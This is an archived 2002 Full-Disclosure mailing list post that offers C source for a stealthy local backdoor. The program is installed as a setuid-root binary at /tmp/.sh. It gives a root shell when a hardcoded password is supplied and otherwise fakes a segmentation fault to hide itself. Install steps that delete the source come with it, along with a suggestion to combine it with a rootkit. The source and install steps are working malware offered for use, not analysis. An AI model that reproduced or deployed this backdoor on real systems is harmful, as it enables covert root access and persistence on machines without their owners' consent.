[Full-Disclosure] [ElectronicSouls] - Stealth Backdoor

From: es@hush.com
Date: 11/29/02


From: es@hush.com (es@hush.com)
Date: Fri, 29 Nov 2002 09:50:21 -0800


-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Here's a useful way to locally backdoor a machine. We suggest that you
use it along with Adore(tm) on your honeypots.

# cat sps.c
/*
 * SUID PASSWORD SHELL Coded by CraigTM [ElectronicSouls]
 * This will only give you a shell, if a password is given
 * If no password is specified, it will look as if it coredumps
 *
 * install:
 * gcc sps.c -o /tmp/.sh
 * chmod +s /tmp/.sh
 * rm -f sps.c
 *
 * run:
 * /tmp/.sh pw
 * --> uid(0)
 *
 *
 */

#include <stdio.h>
#define PASS "pw"

main(int argc, char **argv)
{
 if( (strcmp(argv[1],PASS)==0) )
  {
   setreuid(0, 0);
   setregid(0, 0);
   printf("[ *** Welcome to SPS ;) ][ (C) CraigTM [ElectronicSouls] *** ] \n\n");
   execl("/bin/sh", "/bin/sh", NULL);
  }
 else
  {
   printf("Segmentation Fault\n");
   exit(0);
  }
}

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Mary had a little lamb."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nqPAMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt4W8An0pgX0aPc3GG
7CY4jSfIuJ7F6jXgAJ0c5fT8ICwCc+gAdgxpWAzjrSSZLg==
=sqV9
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427